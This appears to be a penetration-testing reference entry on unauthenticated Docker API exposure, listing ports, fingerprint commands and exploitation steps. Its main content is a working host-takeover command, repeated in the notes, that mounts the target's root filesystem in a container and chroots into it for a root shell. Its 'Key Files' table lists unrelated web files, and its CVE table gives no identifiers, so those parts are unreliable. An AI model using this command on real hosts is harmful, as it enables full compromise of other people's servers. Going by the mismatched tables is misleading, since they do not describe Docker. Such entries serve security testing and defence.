Docker API
Docker Daemon, Docker Remote API, dockerd
The Docker API exposes container management capabilities. Unauthenticated access allows creating privileged containers, mounting host filesystems, and escaping to the host.
Ports
| Port | Protocol | Description |
|---|---|---|
| 2375 | tcp | Docker API (unencrypted) |
| 2376 | tcp | Docker API (TLS) |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
| nmap -sV -p <port> <target> | Service banner and version info |
| nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
| .env | Environment variables with API keys and DB creds |
| config.php | Application configuration file |
| wp-config.php | WordPress database credentials |
| web.config | IIS configuration file |
| .git/config | Git repository configuration |
| robots.txt | Disallowed paths (information disclosure) |
| sitemap.xml | URL structure enumeration |
Default Credentials
| Username | Password | Context |
|---|---|---|
| — | (none) | No authentication by default |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
| — | PE | Container escape via privileged mode |
| — | RCE | Host file system mount |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Container Create | docker -H tcp://<target>:2375 run -it --rm -v /:/host alpine chroot /host sh | Host filesystem access |
| Existing Containers | docker -H tcp://<target>:2375 ps -a | List all containers |
Notes
Exposing the Docker API on TCP (2375/2376) without TLS is an instant host compromise.
Privileged container + host filesystem mount = full host root access.
`docker -H tcp://<target>:2375 run -it --rm -v /:/mnt alpine chroot /mnt sh`
Seen on
Shodan, Censys, FOFA, ZoomEye